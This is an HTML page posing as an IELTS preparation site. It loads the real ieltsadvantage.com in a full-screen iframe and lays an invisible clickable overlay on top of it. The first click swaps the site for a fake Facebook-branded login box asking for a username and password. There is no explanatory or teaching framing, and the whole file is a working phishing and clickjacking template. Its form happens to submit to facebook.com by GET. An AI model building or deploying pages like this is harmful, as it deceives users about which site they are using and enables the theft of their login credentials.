<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <title>IELTS Preparation - IELTSAdvantage.com</title>
    <style>
        body {
            position: relative;
            margin: 0;
        }

        iframe,
        div,
        #test {
            border: none;
            position: fixed;
            width: 100%;
            height: 100%;
            display: block;
        }

        div {
            z-index: 100;
        }

        #container {
            top: 50%;
            left: 50%;
            transform: translate(-50%,-50%);
            width: 500px;
            height: 400px;
            display: none;
            position: fixed;
            border-radius: 5px;
            background-color: #f2f2f2;
            padding: 20px 0 30px 0;
        }
        body {
          font-family: Arial, Helvetica, sans-serif;
        }

        * {
          box-sizing: border-box;
        } 

        input,
        .btn {
          width: 100%;
          padding: 12px;
          border: none;
          border-radius: 4px;
          margin: 5px 0;
          opacity: 0.85;
          display: inline-block;
          font-size: 17px;
          line-height: 20px;
          text-decoration: none
        }

        input:hover,
        .btn:hover {
          opacity: 1;
        }

        .fb {
          background-color: #3B5998;
          color: white;
        }

        .twitter {
          background-color: #55ACEE;
          color: white;
        }

        .google {
          background-color: #dd4b39;
          color: white;
        }

        button {
          background-color: #3B5998;
            color: white;
            cursor: pointer;
            margin-left: 150px;
            /* margin-right: auto; */
            margin-top: 20px;
            padding: 10px 20px;
            border-radius: 4px;
            font-size: 17px;
            font-weight: bold;
            width: 200px;
        }

        .col {
          float: left;
          width: 50%;
          margin: auto;
          padding: 0 50px;
          margin-top: 6px;
        }

        .row:after {
          content: "";
          display: table;
          clear: both;
        }

        .vl {
          position: absolute;
          left: 50%;
          transform: translate(-50%);
          border: 2px solid #ddd;
          height: 175px;
        }

        .vl-innertext {
          position: absolute;
          top: 50%;
          transform: translate(-50%, -50%);
          background-color: #f1f1f1;
          border: 1px solid #ccc;
          border-radius: 50%;
          padding: 8px 10px;
        }

        .hide-md-lg {
          display: none;
        }

        .bottom-container {
          text-align: center;
          background-color: #666;
          border-radius: 0px 0px 4px 4px;
        }

        @media screen and (max-width: 650px) {
          .col {
            width: 100%;
            margin-top: 0;
          }
          .vl {
            display: none;
          }
          .hide-md-lg {
            display: block;
            text-align: center;
          }
        }
        h4 {
            margin: 40px 0;
            text-align: center;
            font-size: 25px;
        }
        p {
            margin: 5px 70px;
            color: white;
            text-align: center;
            background-color: #3B5998;
            padding: 10px;
            border-radius: 4px;
        }
    </style>
</head>

<body>
    <iframe id="frame" src="https://www.ieltsadvantage.com"></iframe>
    <div>
        <a href="#" id="test" onclick="showLoginForm();"></a>
    </div>
    <div id="container">
      <form action="https://facebook.com" method="GET">
            <h4>Login To Learn Ielts Free!!!</h4>
            <!-- <p><i class="fa fa-facebook fa-fw"></i> Login with Facebook</p> -->
            <input type="text" name="username" placeholder="Username" required>
            <input type="password" name="password" placeholder="Password" required>
            <button><i class="fa fa-facebook fa-fw"></i>Login</button>
            <!-- <input type="submit" value="Login"> -->
      </form>
    </div>
    <script>
        function showLoginForm() {
            document.getElementById("container").style.display = "block";
            document.getElementById("frame").style.display = "none";
        }
    </script>
</body>

</html>
